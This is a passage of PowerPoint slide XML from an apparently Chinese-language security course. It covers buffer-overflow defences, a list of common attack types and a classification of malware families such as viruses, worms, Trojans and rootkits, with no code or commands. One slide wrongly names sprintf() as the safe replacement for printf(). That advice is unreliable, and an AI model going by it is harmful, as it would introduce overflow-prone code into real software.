      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3267083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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）关闭不需要的特权程序。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）及时给系统和服务程序漏洞打补丁。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）强制写正确的代码，防止缓冲区溢出</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>采用安全</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语言库函数最新版本</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>()——》</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>strncpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(), </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>()——》</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>程序员检查数组与指针等越界代码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>防范缓冲区溢出攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58372" name="灯片编号占位符 1"/>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92B7EE74-9AC8-4A42-85BA-4B3091D68183}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:pPr/>
              <a:t>249</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>欺骗攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(Spoofing)  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中间人攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(Man-in-the-Middle Attacks)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>拒绝或分布式拒绝服务</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(Denial of Service)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>缓冲区溢出（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Buffer Overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）攻击</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>5.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>后门和漏洞攻击</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>6.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>暴力破解攻击</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95236" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>手段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>常见的攻击方法</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95234"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B58E89B8-A348-4029-BC25-A73475BC3A02}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1498588738"/>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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:buClr>
                <a:srgbClr val="2DA2BF"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）通过操作系统使得缓冲区不可执行，从而阻止攻击者植入攻击代码。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>禁止攻击代码执行，如禁止诸如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>exec()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等系统调用函数的非法使用，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中，程序使用系统调用函数时，返回地址保存在系统内核堆栈，而不是普通堆栈。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>检查系统调用的地址是否来自系统内核堆栈就可知道它是否合法。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）利用编译器的边界检查来实现缓冲区的保护，这个方法使得缓冲区溢出不可能出现，从而完全消除了缓冲区溢出的威胁，但是代价比较大。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）在程序指针失效前进行完整性检查。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>不允许改变控制流，禁止未经授权控制流的改变</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）改进系统内部安全机制。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>高版本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>已启用数据执行保护和地址随机化安全特性防止这种初级的利用方法。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>防范缓冲区溢出攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58372" name="灯片编号占位符 1"/>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92B7EE74-9AC8-4A42-85BA-4B3091D68183}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:pPr/>
              <a:t>250</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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rPr>
              <a:t>恶意代码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47106"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DF4C415-AB34-4946-9517-369604C2B25B}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>251</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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a:t>具有在信息系统上执行非授权进程能力的代码。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>具有各种各样形态，能够引起计算机不同程度的故障，破坏计算机正常运行。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>早期恶意代码：病毒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Virus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>目前：蠕虫(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Worm)、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>恶意网页（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>malicious web page）、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>特洛伊木马（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Trojan Horse）、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>逻辑炸弹（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Logic bombs）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>以及后门（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>backdoor）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>等其他形式的恶意代码日益兴盛。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="329730" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>恶意代码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48131" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{268913D9-5B90-4FEB-B844-A4366D547A59}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>252</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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zh-CN" altLang="en-US"/>
              <a:t>病毒：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>能自我传播、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>需用户干预触</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>发执行的破坏性程序或代码。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>CIH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、爱虫、新欢乐时光、求职信、恶鹰、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>rose…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>蠕虫：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>能自我传播、不需用户干预即可触发执行的破坏性程序或代码。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如红色代码、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>蠕虫王、冲击波、震荡波、极速波</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>特洛伊木马：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>看起来具有正常功能，但实际上隐藏着很多用户不希望功能的程序。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>通常由控制端和被控制端两端组成。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如冰河、网络神偷、灰鸽子</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>……</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="标题 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>恶意代码的分类</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50179" name="灯片编号占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F84C6806-397C-4D8B-966A-F21FCE116E61}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>253</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>后门：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>那些绕过安全性控制而获取对程序或系统访问权的程序方法。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>软件开发阶段，程序员常在软件内创建后门程序便于修改程序缺陷。发布软件前没有删除后门，就成了安全风险。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Bits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>WinEggDrop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Tini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>RootKit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击者用来隐藏自己踪迹和保留</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>访问权限的工具。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在安装目标上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>隐藏</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>自身及指定的文件、进程和网络链接等信息，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>RootKit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Hkdef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ByShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>拒绝服务程序，黑客工具，广告软件，间谍软件，恶意网页</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>……</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="标题 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
